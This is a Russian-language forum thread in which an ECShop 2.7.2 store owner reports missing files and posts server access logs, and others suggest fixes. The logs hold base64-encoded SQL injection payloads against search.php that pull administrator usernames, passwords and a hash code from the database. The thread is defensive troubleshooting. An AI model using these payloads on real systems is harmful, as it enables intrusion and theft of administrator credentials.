Yuryus
Постоялец
- Регистрация
- 3 Апр 2007
- Сообщения
- 388
- Реакции
- 150
Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
Follow along with the video below to see how to install our site as a web app on your home screen.
Примечание: This feature may not be available in some browsers.
*** скрытое содержание ***
На данный момент, в текущей 2.7.2, выложенной на оф.сайте версии, известных дыр нет.2.7.2 в плане безопасности уж очень сырой...
Версия магазина 2.7.2
Последнее время начали пропадать файлы с ftp. Сегодня пропал search.php . Попросил хостера показать логи. По ftp вроде все чисто. А вот запросы к этому файлу перед его исчезновению странные, у меня они вызывают ошибку mysql
MySQL server error report:Array ( [0] => Array ( [message] =>Это сами запросыКод:MySQL Query Error ) [1] => Array ( [sql] => SELECT COUNT(*) FROM `vsecdcom_ecshop`.`ecs_goods` AS g WHERE g.is_delete = 0 AND g.is_on_sale = 1 AND g.is_alone_sale = 1 AND g.goods_id IN ('','':hash_code:31693422540744c0a6b6da635b7a5a93:') AND (( 1 ) ) ) [2] => Array ( [error] => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ':hash_code:31693422540744c0a6b6da635b7a5a93:') AND (( 1 ) )' at line 1 ) [3] => Array ( [errno] => 1064 ) )
Хостер советует сменить пароли к сайту и проверится на вирусы. Я конечно все это сделаю, но возможно кто - нибудь прокомментирует то что я написал выше.Код:174.136.50.39 - - [22/Jul/2010:12:43:06 +0300] "GET /search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxNDY6IicpIEFORCAwIFVOSU9OIFNFTEVDVCAoU0VMRUNUIENPTkNBVCgweDI3LDB4M2EsdXNlcl9uYW1lLDB4M2EscGFzc3dvcmQsMHgzYSx1c2VyX2lkLDB4M2EpIEZST00gZWNzX2FkbWluX3VzZXIgV0hFUkUgYWN0aW9uX2xpc3Q9J2FsbCcgTElNSVQgMSksIDEjIjtpOjE7fX0= HTTP/1.1" 200 728 "http://site.com.ua/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxNDY6IicpIEFORCAwIFVOSU9OIFNFTEVDVCAoU0VMRUNUIENPTkNBVCgweDI3LDB4M2EsdXNlcl9uYW1lLDB4M2EscGFzc3dvcmQsMHgzYSx1c2VyX2lkLDB4M2EpIEZST00gZWNzX2FkbWluX3VzZXIgV0hFUkUgYWN0aW9uX2xpc3Q9J2FsbCcgTElNSVQgMSksIDEjIjtpOjE7fX0=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 174.136.50.39 - - [22/Jul/2010:12:43:08 +0300] "GET /search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IicpIEFORCAwIFVOSU9OIFNFTEVDVCAoU0VMRUNUIENPTkNBVCgweDI3LDB4M2EsY29kZSwweDNhLHZhbHVlLDB4M2EpIEZST00gZWNzX3Nob3BfY29uZmlnIFdIRVJFIGNvZGU9J2hhc2hfY29kZScgTElNSVQgMSksIDEjIjtpOjE7fX0= HTTP/1.1" 200 726 "http://site.com.ua/search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IicpIEFORCAwIFVOSU9OIFNFTEVDVCAoU0VMRUNUIENPTkNBVCgweDI3LDB4M2EsY29kZSwweDNhLHZhbHVlLDB4M2EpIEZST00gZWNzX3Nob3BfY29uZmlnIFdIRVJFIGNvZGU9J2hhc2hfY29kZScgTElNSVQgMSksIDEjIjtpOjE7fX0=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
Поиск перестал работатьПосле ввода будет перекидывать на главную.
Советую всем для начала, как уже писали при выходе 2.7.2 - изменить стандартный префикс таблиц.
Точно все правильно вставили? Я у себя вставил на 2.6.2 и на 2.7.2 - все работает.Поиск перестал работать
Fatal error: Call to undefined function: strripos() in /home/site/public_html/search.php on line 38
Я так понял этот метод тоже сгодится?
Точно все правильно вставили? Я у себя вставил на 2.6.2 и на 2.7.2 - все работает.
Насчет префикса - так точное имя базы не смогут узнать, соответсвенно не смогут дальше перебором данные получать.
На всякий случай прикладываю файл search.php с версии 2.7.2